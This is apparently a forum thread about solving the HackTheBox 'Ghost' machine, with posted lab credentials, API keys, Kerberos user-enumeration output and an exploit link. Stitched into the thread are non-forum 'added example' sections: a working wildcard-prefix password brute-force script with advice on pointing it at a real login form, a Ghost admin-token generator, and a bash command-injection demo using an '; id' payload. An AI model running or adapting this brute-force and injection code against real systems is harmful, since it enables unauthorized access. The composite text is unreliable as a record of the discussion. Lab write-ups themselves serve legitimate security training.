Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
#11
There is this blogpost that could be useful: Ghost CMS Stored XSS Leading to Owner Takeover

https://rhinosecuritylabs.com/research/c...tored-xss/
and the exploit:
https://github.com/RhinoSecurityLabs/CVE...2024-23724

Not clear to me if it's patched or not:
...
"The vendor does not view this as a valid vector so will not be releasing an official patch, but it’s important to us at Rhino to not release unpatched vulnerabilities. While this is a unique case, we’ve decided to make the patch ourselves which is available at TryGhost/Ghost#19646."
...
#12
(Jul 13, 2024, 07:54 PM)chewablechunk01 Wrote:
(Jul 13, 2024, 07:50 PM)orwell1984 Wrote:
(Jul 13, 2024, 07:45 PM)chewablechunk01 Wrote: http://ghost.htb:8008/ghost/api/content/...38c83aaca6

Maybe we could get an IDOR.

How did you get the key?
Inspect the network traffic and click the search icon. You should see a request to the API.

Bro, I can't find it. Please can you explain?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
#13
(Jul 13, 2024, 10:02 PM)osamy7593 Wrote:
(Jul 13, 2024, 07:54 PM)chewablechunk01 Wrote:
(Jul 13, 2024, 07:50 PM)orwell1984 Wrote:
(Jul 13, 2024, 07:45 PM)chewablechunk01 Wrote: http://ghost.htb:8008/ghost/api/content/...38c83aaca6

Maybe we could get an IDOR.

How did you get the key?
Inspect the network traffic and click the search icon. You should see a request to the API.

Bro, I can't find it. Please can you explain?

On the main page, click on the search bar and then open the inspector, go to the Network section, and once you click on the search bar it will show you the key.
#14
Thanks man.

http://intranet.ghost.htb:8008/

user is * and secret is *

#15
(Jul 13, 2024, 10:12 PM)osamy7593 Wrote: Thanks man.

http://intranet.ghost.htb:8008/

user is * and secret is *

Anytime bro!! And how did you find the user and secret?
#16
(Jul 13, 2024, 09:41 PM)ritualist Wrote: http://intranet.ghost.htb:8008

User: kathryn.holland
Secret: *

Yes, just *

It works for all users. Maybe it's treated like a wildcard and we can brute-force a*, b*, etc.


There's also http://gitea.ghost.htb:8008/

A good point, great job!
#17
http://gitea.ghost.htb:8008/
User: gitea_temp_principal
Password: szrr8kpc3z6onlqf

The initial * password I found by just brute-forcing with rockyou. Eventually ***** threw an error and from there I figured it out.

All the secrets can be brute-forced, as I expected above. Just try sz*, szr*, etc. in a script until you find it.
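The prefix brute force ritualist describes in #16 and #17 ("a*", "b*", then "sz*", "szr*", ...), written out as an added example; it is not the script the poster used and it is not the intranet's code. It assumes exactly what the thread hypothesises: the login compares the submitted secret as a glob-style pattern, so "*" alone succeeds for every existing user and "sz*" succeeds only when the real secret starts with "sz". The backend is replaced by an in-memory oracle constructed here (seeded with the gitea_temp_principal credential posted above), so the code runs offline; to use it for real, swap in a function that POSTs the login form and returns True on a successful response.

```python
"""Character-by-character recovery of a secret behind a wildcard-matching login.

Added example, not the poster's script. Assumption: the backend treats the
submitted secret as a glob pattern ("*" matches any suffix). The login oracle
below is a constructed stand-in for the intranet, so everything runs offline.
"""
import fnmatch
import string
from typing import Callable, Dict

Oracle = Callable[[str, str], bool]   # (user, secret_pattern) -> login succeeded?

# Characters we assume the secrets are drawn from. "*", "?" and "[" are
# deliberately excluded: they are glob metacharacters and would skew results.
DEFAULT_CHARSET = string.ascii_lowercase + string.digits


def make_fake_oracle(store: Dict[str, str]) -> Oracle:
    """Constructed stand-in for the intranet login: glob-match the stored secret."""
    def login(user: str, pattern: str) -> bool:
        login.calls += 1                          # count attempts, as a real run would
        real = store.get(user)
        return real is not None and fnmatch.fnmatchcase(real, pattern)
    login.calls = 0
    return login


def recover_secret(login: Oracle, user: str,
                   charset: str = DEFAULT_CHARSET, max_len: int = 64) -> str:
    """Extend a known-good prefix one character at a time, one wildcard probe per guess.

    Cost is at most len(secret) * len(charset) + len(secret) + 1 attempts instead
    of len(charset) ** len(secret) for a blind brute force.
    """
    if not login(user, "*"):
        raise ValueError("'*' alone was rejected: the backend is not wildcard-matching, "
                         "or the user does not exist")
    prefix = ""
    for _ in range(max_len):
        # Exact probe (no trailing "*"): succeeds only once the whole secret is known.
        if prefix and login(user, prefix):
            return prefix
        for ch in charset:
            if login(user, prefix + ch + "*"):
                prefix += ch
                break
        else:
            raise ValueError(f"no character in the charset extends {prefix!r}; "
                             "the secret uses characters outside it")
    raise ValueError(f"secret longer than {max_len} characters")


if __name__ == "__main__":
    # Sample store using the credential the thread posted for gitea_temp_principal.
    oracle = make_fake_oracle({"gitea_temp_principal": "szrr8kpc3z6onlqf"})
    secret = recover_secret(oracle, "gitea_temp_principal")
    print(f"recovered {secret!r} in {oracle.calls} login attempts "
          f"(blind keyspace: {len(DEFAULT_CHARSET) ** len(secret)})")
```

If the real backend rejects the exact-match probe (some wildcard filters only succeed with a trailing "*"), drop that check and stop when no character extends the prefix but `prefix + "*"` still logs in; the error message from the charset loop is the signal that the charset needs widening, not that the technique failed.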
#18
(Jul 13, 2024, 10:24 PM)ritualist Wrote: http://gitea.ghost.htb:8008/
User: gitea_temp_principal
Password: szrr8kpc3z6onlqf

The initial * password I found by just brute-forcing with rockyou. Eventually ***** threw an error and from there I figured it out.

All the secrets can be brute-forced, as I expected above. Just try sz*, szr*, etc. in a script until you find it.

Can you send the script?


Version: v1.0.3 (9dad6e1) - 07/14/24 - Ronnie Flathers @ropnop

2024/07/14 01:43:31 > Using KDC(s):
2024/07/14 01:43:31 > DC01.ghost.htb:88

2024/07/14 01:43:31 > [+] VALID USERNAME: charles.gray@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: justin.bradley@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: robert.steeves@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: beth.clark@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: kathryn.holland@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: Administrator@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: arthur.boyd@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: cassandra.shelton@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: florence.ramirez@ghost.htb
2024/07/14 01:43:31 > [+] VALID USERNAME: jason.taylor@ghost.htb
2024/07/14 01:43:32 > [+] VALID USERNAME: intranet_principal@ghost.htb
2024/07/14 01:43:32 > [+] VALID USERNAME: gitea_temp_principal@ghost.htb

#19
Anyone get anything?

#20
(Jul 14, 2024, 12:19 AM)spamdegratis5 Wrote: There are 3 strings that look like an API key, but none of them worked in the Ghost API.
Also, the public API in Ghost needs an API key. We can write it here since it only allows access to public data: a5af628828958c976a3b6cc81a

RUN echo 659cdeec9cd6330001baefbf > /var/lib/ghost/extra/important

In an old commit, there is another token: 790b10c60e71093a33449804e2
I'm using this script https://ghost.org/docs/admin-api/#token-generation

Maybe the next injection point is the bash command from the dev API? We need to set the header X-DEV-INTRANET-KEY to match DEV_INTRANET_KEY, and basically we can execute any bash command:

use std::process::Command;

// data.url is interpolated unescaped into a string that bash parses, so any
// shell metacharacters in the url field are executed (command injection).
let result = Command::new("bash")
    .arg("-c")
    .arg(format!("intranet_url_check {}", data.url))
    .output();

It says the API key is wrong.

(Jul 14, 2024, 12:19 AM)spamdegratis5 Wrote: There are 3 strings that look like an API key, but none of them worked in the Ghost API.
Also, the public API in Ghost needs an API key. We can write it here since it only allows access to public data: a5af628828958c976a3b6cc81a

RUN echo 659cdeec9cd6330001baefbf > /var/lib/ghost/extra/important

In an old commit, there is another token: 790b10c60e71093a33449804e2
I'm using this script https://ghost.org/docs/admin-api/#token-generation

Maybe the next injection point is the bash command from the dev API? We need to set the header X-DEV-INTRANET-KEY to match DEV_INTRANET_KEY, and basically we can execute any bash command:

use std::process::Command;

// data.url is interpolated unescaped into a string that bash parses, so any
// shell metacharacters in the url field are executed (command injection).
let result = Command::new("bash")
    .arg("-c")
    .arg(format!("intranet_url_check {}", data.url))
    .output();

Bro, I found scan.rs ... how can we access it?

http://intranet.ghost.htb/api-dev/ What is the endpoint?

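spamdegratis5 mentions generating tokens with the script from https://ghost.org/docs/admin-api/#token-generation. Below is an added example of that token format using only the Python standard library; it is not Ghost's code and not the script the poster ran. Per the Ghost documentation, an Admin API key has the form "<id>:<hex secret>", and the token is an HS256 JWT whose header carries kid=id, whose payload has iat, exp (five minutes later) and aud="/admin/", and which is signed with the hex-decoded secret. A bare hex string with no ":" is a Content API key: it identifies a client for the public content endpoints but is no signing secret, which is one reason a string that "looks like an API key" may be rejected by the Admin API. The key used below is constructed for the example and is not one of the strings posted in the thread.

```python
"""Ghost Admin API token generation with the standard library only.

Added example following the format documented at
https://ghost.org/docs/admin-api/#token-generation. The sample key at the
bottom is constructed for this example.
"""
import base64
import hashlib
import hmac
import json
import time
from typing import Optional, Tuple

ADMIN_AUD = "/admin/"
TOKEN_LIFETIME = 5 * 60           # seconds; the documented token lifetime


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def ghost_admin_jwt(admin_key: str, now: Optional[int] = None) -> str:
    """Return the token for the Admin API, sent as 'Authorization: Ghost <token>'."""
    if ":" not in admin_key:
        # A bare hex string is a Content API key, not an id:secret Admin API key,
        # so there is no secret to sign with.
        raise ValueError("expected an Admin API key of the form id:secret")
    key_id, secret_hex = admin_key.split(":", 1)
    iat = int(time.time()) if now is None else now
    header = {"alg": "HS256", "typ": "JWT", "kid": key_id}
    payload = {"iat": iat, "exp": iat + TOKEN_LIFETIME, "aud": ADMIN_AUD}
    signing_input = (_b64url(json.dumps(header, separators=(",", ":")).encode())
                     + "." + _b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(bytes.fromhex(secret_hex), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def verify_admin_jwt(token: str, secret_hex: str) -> Tuple[dict, dict, bool]:
    """Decode a token and check its signature; returns (header, payload, signature_ok)."""
    head_b64, body_b64, sig_b64 = token.split(".")
    expected = hmac.new(bytes.fromhex(secret_hex), f"{head_b64}.{body_b64}".encode(),
                        hashlib.sha256).digest()
    ok = hmac.compare_digest(expected, _b64url_decode(sig_b64))
    return (json.loads(_b64url_decode(head_b64)),
            json.loads(_b64url_decode(body_b64)), ok)


if __name__ == "__main__":
    sample_key = "0123456789abcdef01234567:" + "ab" * 32    # constructed, not a real key
    token = ghost_admin_jwt(sample_key)
    print(token)
    print(verify_admin_jwt(token, sample_key.split(":")[1]))
```

The resulting token goes in the `Authorization: Ghost <token>` header against the admin endpoints under `/ghost/api/admin/`; since it expires after five minutes, generate it immediately before each request rather than caching it.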
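The injection point spamdegratis5 points at in the Rust snippet, shown as an added example rather than the intranet's own code: `format!("intranet_url_check {}", data.url)` is handed to `bash -c`, so whatever is in the url field is parsed by the shell. The same two patterns are reproduced here with Python's subprocess so they can be run offline, with `echo checking` standing in for the real intranet_url_check binary. The header name X-DEV-INTRANET-KEY and the field name "url" come from the post; the API path is not known from the thread and is left as a parameter.

```python
"""Why the intranet's URL check is a command injection, and how to close it.

Added example mirroring the quoted Rust (bash -c with an interpolated url),
not the intranet's code. "echo checking" stands in for intranet_url_check.
"""
import shutil
import subprocess
from typing import Dict, Tuple

SHELL = shutil.which("bash") or "sh"  # the Rust uses bash; sh behaves the same here
CHECKER = "echo checking"             # stand-in for the intranet_url_check binary


def build_request(dev_key: str, url: str) -> Tuple[Dict[str, str], Dict[str, str]]:
    """Headers and JSON body for the dev API: the key header named in the source
    and the url field that ends up on the bash command line. The endpoint path
    is not known from the thread and is not assumed here."""
    return ({"X-DEV-INTRANET-KEY": dev_key, "Content-Type": "application/json"},
            {"url": url})


def url_check_vulnerable(url: str) -> str:
    """Mirrors the Rust: string interpolation, then `bash -c`. Shell metacharacters
    in url (";", "|", "$(...)") are executed as further commands."""
    out = subprocess.run([SHELL, "-c", f"{CHECKER} {url}"],
                         capture_output=True, text=True)
    return out.stdout


def url_check_fixed(url: str) -> str:
    """Same command, but url travels as a positional parameter ("$1") instead of
    being spliced into the script, so the shell never interprets its contents.
    The Rust equivalent is Command::new("intranet_url_check").arg(&data.url)
    with no bash in between."""
    out = subprocess.run([SHELL, "-c", f'{CHECKER} "$1"', "_", url],
                         capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    payload = "http://intranet.ghost.htb; id"
    headers, body = build_request("<DEV_INTRANET_KEY>", payload)
    print(headers, body)
    print("vulnerable:", repr(url_check_vulnerable(payload)))
    print("fixed:     ", repr(url_check_fixed(payload)))
```

With the vulnerable form the output has two lines, the check and the result of the injected `id`; with the fixed form the whole payload, semicolon included, is passed to the checker as one literal argument. Even the fixed form still lets the url reach intranet_url_check, so that binary should additionally validate the value as a URL (scheme, host) before doing anything with it.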